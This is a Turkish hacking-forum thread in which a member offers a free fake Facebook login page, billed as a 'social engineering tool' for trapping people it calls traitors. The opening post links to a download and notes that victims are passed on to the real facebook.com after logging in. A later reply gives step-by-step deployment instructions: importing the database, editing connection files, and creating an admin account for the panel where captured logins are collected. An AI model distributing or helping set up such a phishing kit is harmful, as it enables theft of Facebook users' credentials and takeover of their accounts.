[DEV KONU] Yeni Nesil Sahte Facebook Login | By Rias Gremory

Rias Gremory

Katılımcı Üye
20 Ağu 2017
269
3
Tanrı Dağı
[COLOR="YellowFaceBook v1 Sosyal Mühendislik Aracımız.


[URL="https://tik.lat/FfrD9"] İndirmek İçin Tıklayın
[/URL]

Sizler için ücretsiz olarak geliştirdiğimiz bu script sayesinde vatan hainlerini tuzağa düşürebileceksiniz. Bi kere giris yapıldığında facebook.com`un kendi sitesine atmaktadır.

Scriptin Facebook Giriş Sayfasının Resmi :

kO1MLq.jpg


Admin panele ulaşmanız için [COLOR="Redhttp://www.beratyıldız.com/bagis/Buraya Tıklayabilirler.[/URL]

[COLOR="Yellow
 
Son düzenleme:

ekrem bora

Yeni üye
28 Haz 2016
12
0
neden gırıs yapamıyorum ve vıdeolu olarak neden anlatmadınız ben bu sıteye uyeyeyım gostermıs oldugunuz resımde belırtılen konuma nasıl gırecegım saygılarımla
 

Rias Gremory

Katılımcı Üye
20 Ağu 2017
269
3
Tanrı Dağı
neden gırıs yapamıyorum ve vıdeolu olarak neden anlatmadınız ben bu sıteye uyeyeyım gostermıs oldugunuz resımde belırtılen konuma nasıl gırecegım saygılarımla

scriptleri sitenize attıkatan sonra size verilen dosyadaki SQL dosyasını php my admine aktarın sonra baglan rg_baglan.php ve ap-ayyldz/ayar.php dosyasının içinden Database bağlantı ayarlarını gerçekleştirin. sonra siteadresi.com/ap-ayyldz/ diye url kısmına girin ve önünüze giriş ekranı çıkacaktır. kullanıcı oluşturmadıysanız giriş yapamazsınız. siteadresiniz/ap-ayyldz/olustur.php bu adrese giderek kullanıcı oluşturabilirsiniz . sonra buradaki olustur.php yi siliniz .
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.